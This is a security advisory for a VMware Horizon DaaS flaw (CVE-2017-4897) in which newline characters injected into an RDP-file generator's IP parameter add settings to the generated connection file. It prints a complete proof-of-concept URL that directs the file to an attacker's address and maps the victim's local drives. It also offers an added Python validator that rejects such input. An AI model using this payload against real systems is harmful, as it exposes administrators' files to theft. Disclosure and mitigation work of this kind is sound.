Vulnerability Disclosure - VMware Horizon DaaS - Improper IP Address Validation

VMSA-2017-0002, CVE-2017-4897
Publish date: March 10 2017
Vendor: VMware
Product: Horizon DaaS Platform
Versions affected: 6.1.x
Fixed version: 7.0.0
Author: Ahmad Ashraff

A security advisory was released by the VMware Security Team on the 3rd of March 2017 in their Security Blog.

Improper IP Address Validation by getRdpByIP (CVE-2017-4897)

Horizon DaaS allows the creation of a remote desktop connection (.rdp) file through the application. This action can only be performed by a user with administrative privileges. The request looks similar to the following:

<host>/admin/getRdpByIp.action?ipAddress=<ip address>

However, it was found that the ipAddress parameter is not properly validated. Because the value is written into the generated connection file without filtering, newline characters (%0a) in the parameter allow additional settings to be injected into the remote desktop connection file, such as drive mapping redirections.

Example:

https://<host>/admin/getRdpByIp.action?ipAddress=<attacker's ip address>:3389%0aconnect%20to%20console:i:1%0aadministrative%20session:i:1%0ausername:s:Administrator%0adomain:s:.%0ascreen%20mode%20id:i:2%0ause%20multimon:i:0%0adesktopwidth:i:800%0adesktopheight:i:600%0asession%20bpp:i:32%0awinposstr:s:0,3,0,0,800,600%0acompression:i:1%0akeyboardhook:i:2%0aaudiocapturemode:i:0%0avideoplaybackmode:i:1%0aconnection%20type:i:2%0adisplayconnectionbar:i:1%0adisable%20wallpaper:i:1%0aallow%20font%20smoothing:i:0%0aallow%20desktop%20composition:i:0%0adisable%20full%20window%20drag:i:1%0adisable%20menu%20anims:i:1%0adisable%20themes:i:0%0adisable%20cursor%20setting:i:0%0abitmapcachepersistenable:i:1%0aaudiomode:i:0%0aredirectprinters:i:1%0aredirectcomports:i:1%0aredirectsmartcards:i:1%0aredirectclipboard:i:1%0aredirectposdevices:i:0%0aredirectdirectx:i:1%0adevicestoredirect:s:*%0adrivestoredirect:s:*%0aautoreconnection%20enabled:i:1%0aauthentication%20level:i:2%0aprompt%20for%20credentials:i:0%0anegotiate%20security%20layer:i:1%0aremoteapplicationmode:i:0%0aalternate%20shell:s:%0ashell%20working%20directory:s:%0agatewayhostname:s:%0agatewayusagemethod:i:4%0agatewaycredentialssource:i:4%0agatewayprofileusagemethod:i:0%0apromptcredentialonce:i:1%0ause%20edirection%20server%20name:i:0%0anull

An authenticated administrator who is tricked into opening the above URL receives a remote desktop connection file. Once this file is opened, it connects to the attacker’s IP address, and the injected settings cause the administrator’s local drives to be mapped into the attacker’s remote desktop session.
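The root cause described above is that a user-controlled value is written into a line-oriented file format without being checked against the type it is supposed to be (an IP address, optionally with a port). The following is an added example written for this page, not VMware's code or the fix shipped in 7.0.0: it parses the parameter strictly with Python's ipaddress module, rejects control characters and anything that is not an IP literal, and only then renders a connection file. The RDP template, the function names and the sample inputs are constructed for the example; the handling goes slightly beyond the page's IPv4 case by also accepting bare IPv6 literals.

```python
import ipaddress

# Minimal connection-file template. The settings emitted by the real
# product are not known from the advisory; this template is an assumption
# chosen so that drive and clipboard redirection stay disabled.
RDP_TEMPLATE = (
    "full address:s:{address}\r\n"
    "drivestoredirect:s:\r\n"
    "redirectclipboard:i:0\r\n"
)

DEFAULT_RDP_PORT = 3389


def parse_ip_and_port(raw, default_port=DEFAULT_RDP_PORT):
    """Parse 'ip' or 'ipv4:port' into (ip_address object, port).

    Raises ValueError for anything that is not an IP literal with an
    optional numeric port, which is the check the vulnerable handler lacked.
    Bracketed IPv6 with a port ('[::1]:3389') is deliberately not accepted
    here; failing closed is preferable to a permissive parser.
    """
    # Reject CR, LF and NUL up front: these are what turn one setting line
    # into several in the generated file.
    if raw != raw.strip() or any(ch in raw for ch in "\r\n\x00"):
        raise ValueError("control characters or surrounding whitespace in address")

    host, port = raw, default_port
    if raw.count(":") == 1:
        # Exactly one colon: IPv4 address with an explicit port.
        host, port_str = raw.split(":")
        if not port_str.isdigit():
            raise ValueError("port must be numeric")
        port = int(port_str)
        if not 1 <= port <= 65535:
            raise ValueError("port out of range")

    # ipaddress.ip_address raises ValueError for hostnames, trailing text
    # and anything else that is not a well-formed IPv4/IPv6 literal.
    ip = ipaddress.ip_address(host)
    return ip, port


def is_safe_address(raw):
    """True if the parameter would be accepted by the strict parser."""
    try:
        parse_ip_and_port(raw)
    except ValueError:
        return False
    return True


def build_rdp_file(raw_address):
    """Render the connection file only from validated, normalised values."""
    ip, port = parse_ip_and_port(raw_address)
    # Re-serialise the parsed address rather than echoing the raw input, so
    # nothing the caller supplied reaches the file verbatim.
    address = "[{}]:{}".format(ip, port) if ip.version == 6 else "{}:{}".format(ip, port)
    return RDP_TEMPLATE.format(address=address)


if __name__ == "__main__":
    # Constructed sample inputs: a legitimate address and a newline-injection
    # attempt of the kind the advisory describes.
    for sample in ("10.0.0.5:3389", "10.0.0.5:3389\nconnect to console:i:1"):
        print(repr(sample), "->", "accepted" if is_safe_address(sample) else "rejected")
```

Two properties matter for a generator like this: the value is parsed into a typed object and re-serialised, so the raw string never reaches the file, and the control-character check runs before anything else so a rejected request can be logged with its offending input for detection.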